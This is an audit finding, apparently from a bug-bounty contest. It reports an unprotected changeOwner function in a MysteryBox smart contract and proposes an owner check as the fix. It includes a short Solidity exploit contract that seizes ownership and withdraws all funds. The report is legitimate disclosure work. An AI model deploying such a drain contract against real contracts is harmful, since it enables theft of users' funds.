Vulnerable changeOwner() function leads to theft of contract holdings.
Summary
There is a critical vulnerability in the changeOwner function which allows anyone to call this function and change the mysteryBox contract owner.
Vulnerability Details
An attacker can call changeOwner(address(this)); from a remote contract. This will give the calling address ownership over the mysterybox contract. The malicious user can then utilize the withdrawFunds();and retrieve all of the contract funds to their malicious contract.
Remix POC:
// SPDX-License-Identifier: MITinterface IMagic {function changeOwner(address _newOwner) external;function withdrawFunds() external;}contract Exploit {IMagic magic;address payable public owner;constructor(address _magicAddress){magic = IMagic(_magicAddress);owner = payable(msg.sender);}function attack() public{magic.changeOwner(address(this));magic.withdrawFunds();}receive() external payable {}}
Impact
Total loss of MysteryBox contract holdings.
Tools Used
Remix
Recommendations
Changefunction changeOwner(address _newOwner) to first check if the caller is the owner. If not the owner then revert.
Appeal created
Anyone can change owner
Rewards breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.